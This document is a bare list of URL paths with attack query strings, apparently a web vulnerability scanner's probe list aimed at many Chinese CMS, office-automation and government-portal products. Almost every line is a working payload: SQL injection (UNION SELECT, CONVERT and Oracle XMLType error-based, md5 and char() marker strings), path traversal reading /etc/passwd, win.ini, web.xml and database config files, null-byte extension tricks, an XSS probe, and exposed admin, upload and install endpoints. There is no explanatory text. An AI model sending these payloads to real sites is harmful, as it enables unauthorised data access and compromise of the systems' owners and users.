/tt/trade/register.asp?step=checkdup&checkname=ologinname&checkval=haha'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20--&pk=0
/zwgkinfo/DepartMentInfoList.aspx?CategoryNum=-12'/**/and/**/1=char(106)--&DeptCode=
/jis/interface/offer.jsp?flag=user
/jis/down.jsp?pathfile=./down.jsp%00.jpg
/MockLogin.aspx
/mobile/user.php?act=order_list
/seeyon/management/status.jsp
/api/download.ashx?fid=nUDWEgdorSH4j/+9GiQTlA==
/monitoring?part=web.xml
/?/s_tag/hehe%25%27%20union%20select%201,2,3,md5(1122),5,6,7%20from%20go_admin%23
/download.action?fullPath=./WEB-INF/web.xml
/jcms/workflow/design/readxml.jsp?flowcode=../../../WEB-INF/config/dbconfig
/jis/update/update.jsp?fn_billstatus=U
/install/install.php
/public/minify.php?f=../ooxxooxxo/hehe.js
/admin/index.asp
/plus/outside.php?id=../template/default/style/yun_index.css%00
/productpic.aspx?id=100611)%20and%201=char(106)%20--
/jsp/util/file_download.jsp?filePath=../../../../../../../etc/passwd
/jsp/util/file_download.jsp?filePath=c:%5Cwindows%5Cwin.ini%00.xml
/jcms/m_5_5/m_5_5_3/import.jsp
/upload!uploadImg.action
/AuthReturn.aspx?APTokenResponse=a$8SOIYyiGVYBge5mdoY5nIeAueY7BixUtLdHqpy8o3RqM9hVnisaXAA==
/?do=index&mod=goods
/index.php/*123*/'union/**/select/**/1,2,3,4,5,6,7,8,md5(1122),10,11%23&action=getatlbyid
/cart.aspx?act=spikebuy&spikeid=3%20and%201=char(106)%2bchar(120)%20--
/webmail/client/mail/index.php?module=operate&action=down&file=./../../mainconfig.php
/MoreIndex.aspx?pkId=6434&kw=a'%20and%201=char(106)%20--&st=2&t=1
/RuvarHRM/web_include/select_baseinfo.aspx?bt_name=1')%20%20and%20(char(106)%2bchar(106))%3E0--
/Default.aspx?item=1)%20and%201=(char(106)%2bchar(106))%20--
/news/searchNewsAction.shtml?keywords='%7C%7C(SELECT%20'ijx'%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20dual)))%7C%7C'
/zwfw/zwfwInfoAction!execute.shtml?action=5&sid='%7C%7C(SELECT%20'ijx'%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20dual)))%7C%7C'
/news/newsInfoAction.shtml?infotype=-1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20and%20'at'='at
/client/checkuser.aspx?user=test'%20and%20char(106)%3E0--&pwd=1
/siteserver/userRole/modal_sendMail.aspx?From=User&UserNameCollection=test'+and+char(106)%2bchar(106)=0%20--
/admin/include/config.php?depth=../../templates/default/images/css/metinfo.css%00
/admin/login/login_check.php?depth=../../templates/default/images/css/metinfo.css%00&admin_index=1
/admin/system/lang/lang.func.php?depth=../../../public/js/public.js%00
/webusr/check.aspx?loginname=nosec'%20and%201=char(106)%2bchar(106)%20--%20
/plugins/phpdisk_client/client_sub.php?action=upload_file
/ExhibitionCenter.aspx?area=-12'%20and/**/1=char(106)/**/--
/SupplyList.aspx?parentid=88&classid=-12%20and/**/1=char(106)/**/%20--%20
/company/SearchProducts.aspx?id=115&keyname=ppp%25'%20and/**/1=char(106)/**/%20--%20
/Web/Login.aspx
/Web/KeySearch.aspx?searchid=1234
/portal/admin/setright.aspx?id=-1
/infolist.aspx?ClassId=5)%20and%201122=CONVERT(INT,(SELECT%20CHAR(84)%2bCHAR(97)%2bCHAR(105)%2bCHAR(87)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(103)%2bCHAR(111)%2bCHAR(58)%2bCHAR(104)%2bCHAR(111)%2bCHAR(109)%2bCHAR(101)))%20AND%20(1=1
/guestbook.aspx?do=show&id=1%20union%20all%20select%20null,null,null,null,null,null,null,null,null,null,null,char(106)%2bchar(106)%2bchar(108)%20--
/prog/filedown.php?pe_id=MQ==
/emlib4/system/DataSource/GetDataGridCtrlResult.aspx?_debug_=undefined
/emlib4/format/release/aspx/eml_userwh.aspx
/voteresult.aspx?activeid=-1%20UNION%20SELECT%201,char(106)%2bchar(106),3,4,5%20from%20syscolumns%20--
/kbase_list.aspx?kcatid=1%20UNION%20SELECT%201,2,char(106)%2bchar(106),4,5,6,7,8%20from%20syscolumns--
/getTopLinksPortalCategoriesAction.action?siteId=../../../../../../../../../../windows/win.ini%00.jpg
/letter/letter_detail.aspx?id=8'%20%20and+1=char(106)%2bchar(106)%20--
/cms/infopub/rss.jsp?channelcode=-A%27%20union%20all%20select%20char%28106%29%2bchar%28106%29%2Cnull%2Cnull%2Cnull%20--&maxnum=20
/web/doc_hit.jsp?documentid=-21%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)
/OperationManage/BlogMoreIndex.aspx?pkId=&blogId=1&kw=abc'%20and%201=char(106)%20--&st=1&t=1
/Tools/stream/FlvStream.ashx?file=./Index.aspx
/tj/total.aspx?act=other&typeid=1%27%20AND%209518%3DCONVERT%28INT%2C%28SELECT%20char%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29%2b%28SELECT%20%28CASE%20WHEN%20%289518%3D9518%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%2bCHAR%28100%29%29%29%29%20AND%20%27xhJK%27%3D%27xhJK
/webConfigSet/configSetting.aspx?url=/login/index.aspx
/cms/cms/infopub/gjjs.jsp?pubtype=S&pubpath=dkt&startdate=&enddate=&topic=&content=&authorname=&origin=&description=&webappcode=A02&searchdir=A02&templetid=-21'%20union%20all%20select%20char(106)%2bchar(62)%2bchar(60),null,null%20--
/mydocument/download.aspx
/prog/get_passwd_1.php?user=hehe%3Cscript%3Ealert(42873)%3C/script%3E%20
/cjwtlist.aspx?t=(select+convert(int%2c@@version))
/FormBuilder/PrintFormList.aspx?file_id=1)/**/UNION/**/ALL/**/SELECT/**/CHR(97)%7C%7CCHR(60)%7C%7CCHR(99),NULL/**/FROM/**/DUAL/**/--
/module/sitesearch/index.jsp?keyword=&columnid=-1650)%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--%20&keyvalue=&webid=&currpage=2
/FormBuilder/yjzxList.aspx?id=1/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,CHR(106)%7C%7CCHR(60)%7C%7CCHR(106)/**/FROM/**/DUAL--
/FromBaoShan/LaborSpecial/PlacardView.aspx?info_id=1/**/UNION/**/ALL/**/SELECT/**/CHR(106)%7C%7CCHR(106)%7C%7CCHR(106),NULL,NULL,NULL/**/FROM/**/DUAL--
/goods/GoodsAdd.aspx?goodsid=1/**/AND/**/1122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)&flag=2
/pub/search/search_video_view.asp?id=3&mid=4%20and%201122=CONVERT(INT,(SELECT%20char%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29))&yh=1
/index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
/main/findgbm2.asp?sql=SELECT+char%28106%29%2Bchar%28106%29%2Bchar%28106%29+FROM+Master%2E%2ESysDatabases+ORDER+BY+Name&sqlbak=SELECT+char%28106%29%2Bchar%28106%29%2Bchar%28106%29+FROM+Master%2E%2ESysDatabases+ORDER+BY+Name%20&px=
/ebsys/fceform/common/djframe.htm?isfile=release&djsn=eb_runsql
/nameedit.asp?table=bbs&id=1%20union%20all%20select%20null,null,null,null,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),null%20--&action=edit
/jis/front/sdgs/updateuser.jsp
/lm/down.jsp?pathfile=down.jsp
/website/dflz/dflzCjAction!caiwugk_list.action?orgCode=&orgName=&zuOrgCode=&zuOrgName=&cwgkbbh=-21'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20--%20&cwgkbmc=
/Documents/FolderInfor.asp?POAID=0'%20or%201122=CONVERT(INT,(SELECT%20char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100)))%20--&Source=0
/Documents/FolderInfor.asp?OAID=0%20or%201122=CONVERT(INT,(SELECT%20char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100)))%20--&Source=0
/meetingroom/MeetingRoom_UseInfo.asp
/lm/front/api/opr_datacall.jsp?fn_billstatus=E&vc_id=-12'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),NULL,NULL,NULL,NULL,NULL--
/downloadFile.action?path=index.jsp
/portal/getJsonData.action?userId=9090&ruleID=portal-common.getProFileInfo
/lm/front/noontimelist.jsp?flag=a&start=1&end=2&sysid=2'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL%20FROM%20DUAL%20--&groupid=4
/php/bill/print_addfeelog.php
/objectbox/selectx_userlist.jsp?fn_Keywords=1'%20UNION%20ALL%20SELECT%20NULL,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),NULL--%20&perm=&cPage=1&tiao=
/meetingroom/ShenQingInforDis.asp?OAID=-12%20AND%201993%20IN%20(char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100))%20---
/information/oa_infordislist.asp?class=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
/information/OA_Condition.asp?class=1&subclass=(CONVERT(INT,(SELECT%20CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100))))---
/message/mytreedata.asp?bumenid=-12%20AND%201432=CONVERT(INT,(SELECT%20CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100)))--%20&time=&time=
/house/upload/upload.asp
/sbweb/Upload_Save_2.asp
/feReport/chartList.jsp?delId=1&reportId=1%20and%201122=CONVERT(INT,(SELECT%20char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100)))%20--
/jsearch/admin/opr_forcechangepwd.jsp
/home/front/search/opr_chatsearch.jsp?action=simplesearch&words=1%25%27%20union%20all%20select%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2Cchr%28119%29%7C%7Cchr%28101%29%7C%7Cchr%2898%29%7C%7Cchr%28115%29%7C%7Cchr%2899%29%7C%7Cchr%2897%29%7C%7Cchr%28110%29%7C%7Cchr%2858%29%7C%7Cchr%28105%29%7C%7Cchr%2858%29%7C%7Cchr%28102%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28100%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20DUAL%20--
/celive/live/index.php?action=1
/admin/Site/AddDomain.aspx?Edit=1&id=1000/**/%20/**/union/**/%20/**/all/**/%20/**//**/SELECT/**/%200,/**/CHAR(106)%2bCHAR(106)%2bCHAR(106),0,0,'',0,2014,0/**/FROM/**/%20ZL_Manager
/baseNews_view.jsp?newsId=-12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20--
/Lesktop/command.aspx
/Lesktop/Management/DeptEdit.aspx?did=1%20and%20char(106)%3E0
/Lesktop/sendfile.aspx
/Office_Supplies/Goods_Main.aspx?type=1&info_id=1/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
/Personnel/Infomation.aspx?userid=1/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
/Personnel/VacationComputation.aspx?id=11/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
/RCMANAGE_New/rcgl.aspx?UID=11/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
/ObjSwitch/HYTZ.aspx?userid=11/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
/modules/pdflist.aspx?info_id=1/**/union/**/all/**/select/**/null,null,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),null,null,null/**/from/**/dual%20--
/jcms/m_5_e/init/sitesearch/opr_classajax.jsp?classid=1%20union%20all%20select%2012,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20from%20dual%20--
/lm/sys/opr_secsetorder.jsp?parentid=1%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x7e,md5(1122),0x7e),NULL,NULL,NULL,NULL
/lm/sys/opr_secsetorder.jsp?parentid=1%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL%23
/jcms/jcms_files/jcms1/web2/site/module/comment/opr_readfile.jsp?filename=opr_readfile.jsp
/managerNManager.action
/lm/manage/opr_setappraisal.jsp?fn_billstatus=E&vc_setapprid=-2087%20UNION%20ALL%20SELECT%20CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),NULL,NULL,NULL%20FROM%20DUAL--
/jcms/m_1_9/column/getgroupuser.jsp?jgid=1'%20UNION%20ALL%20SELECT%20NULL,CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100)%20--&spell=2&webid=3&userid=4
/lm/sys/opr_bulletin_show.jsp?vc_id=1'%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL%20--
/lm/front/mailpublist.jsp?editpagename=/../../../../../../../../../../../../../etc/passwd%00.ftl
/jcms/workflow/design/opr_model_class.jsp?fn_billstatus=E&vc_id=1'%20UNION%20ALL%20SELECT%20NULL,CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100),NULL,NULL,NULL%20--
/jcms/m_5_5/m_5_5_1/objectbox/selectx_search.jsp?spell=1%25%27%20union%20all%20select%20null%2Cchr%28119%29%7C%7Cchr%28101%29%7C%7Cchr%2898%29%7C%7Cchr%28115%29%7C%7Cchr%2899%29%7C%7Cchr%2897%29%7C%7Cchr%28110%29%7C%7Cchr%2858%29%7C%7Cchr%28105%29%7C%7Cchr%2858%29%7C%7Cchr%28102%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28100%29%20from%20dual%20--
/lm/manage/opr_mailinfo_getsecproperty.jsp?vc_bgmailproperty=1'%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20DUAL%20--
/lm/manage/opr_mailinfo_getsecproperty.jsp?vc_bgmailproperty=1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x7e,0x7765627363616E3A693A66696E64,0x7e)%23
/lm/front/mailwrite_over.jsp?editpagename=/../../../../../../../../../../../../../etc/passwd%00.ftl
/admini/question/question.aspx?ID=25'%20and%20char(106)%2bchar(106)%3E0%20--
/ModifyNewsAction.do?newsID=-12
/plugins/qmail/MailTo.aspx?mail=1%27and%02CHAR(106)%2bCHAR(39)%3E0%02and%02%271%27=%271
/manage/Template/DSManage.aspx
/index.php?id=product&c=project&cate=1&ext[id%3C0%20union%20select%20111,2,3,4,5,6,md5(1122),8,9%20,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--]=1
/api.php?id=_arclist&c=api&f=phpok&param[pid]=41&param[notin]=41)%20Union%20Select%201,md5(1122),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--%20
/admin/admin_adminmodifypwd.aspx
/jcms/m_5_6/ajax_printcol.jsp?cataid=1)%20UNION%20ALL%20SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)%20--
/feform/createprinttemplete.jsp?formid=1'%20AND%204321=CONVERT(INT,(SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)))%20--
/fenc/syncsubject.jsp?pk_corp=1'%20AND%202047=CONVERT(INT,(SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)))%20--
/indexsearch/filter.jsp?tableId=1%20AND%202047=CONVERT(INT,(SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)))%20--
/Modules/jycg/SFDB.aspx?sfpjnm=-12'%20UNION%20ALL%20SELECT%20NULL,NULL,CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116),NULL%20--&type=1
/print/search_print_proof.jsp?proof_no=just_sql_test'
/include/user/mulbumentree.asp
/include/user/usertree.asp
/include/zidian/dantree.asp?ZiDian='%20AND%204321%3DCONVERT%28INT%2C%28SELECT%20CHAR%28106%29%2bCHAR%28117%29%2bCHAR%28115%29%2bCHAR%28116%29%2bCHAR%2895%29%2bCHAR%28116%29%2bCHAR%28101%29%2bCHAR%28115%29%2bCHAR%28116%29%29%29%20--
/public/oa_nodebanliren_frm.asp
/include/chaxundetail.asp
/include/user/bdtreemx.asp
/admin/Fileup.aspx?path=notice/upload
/plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20UNION%20SELECT%201,2,3,md5%281122%29,5,6,7,8,9%23
/inc/guestbook.php?do=guestbook&t=ajax&mid=1&content=testtesta%E9%8C%A6%27,(select%20concat%280x7c,md5%281122%29,0x7c%29from%20job_admin%20limit%201%29,NOW%28%29,1,1,3,1,if%281=2,1,char%28@%60%27%60%29%29%29%23@%60%27%60
/index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
/hlp/help.asp?HlpCode=1'%20and%201=char(106)%20--
/Code/Common/SysCommonAttach.aspx?Method=GetNewID&IDs=isTrans&tabRecordId=1%27%20AND%201%3DCHAR%28106%29%20--
/ModifyNewsAction.do?newsID=-12'%20and%20(select%201%20from%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a);%20%23
/piw/Site/KeyWordExport.jsp?ids=-111)%20union%20select%20Username,md5%281122%29,222,4444,5555%20from%20zduser%23
/schedule/Entrust.aspx?nidlist=0,1)/**/and/**/1=CHAR(106)%20--
/common/mod/ajax.ashx
/SSSweb/SuggestionCollection/PostSuggestion.aspx?ID=-1'%20and%201=char(106)%20--
/dakai.aspx
/SSSweb/SuggestionCollection/PostSuggestion.aspx?ID=3'%20and%201=char(106)%20--
/Permission/Application_Query_List.aspx?deptName=3'%20and%201=char(106)%20--
/main/model/childcatalog/zxzxinfo.jsp?MailId=13%20UNION%20ALL%20SELECT%20NULL,CHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2859%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29,NULL,NULL,NULL,NULL,NULL,NULL%20--
/index_page/geren_list_page.aspx?server=1&refid=1'%20AND%201=CHAR(106)%2bCHAR(60)%20--
/website/level3.jsp?tablename=7&infoid=-1'%20UNION%20ALL%20SELECT%20CHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2859%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29--
/varset/modifyTime.asp?varname=&id=495'%20union%20all%20select%201,2,3,0x66696E643A76756C,5,6,7,8,9%20from%20teachers%20--
/getpassword.php?do=login
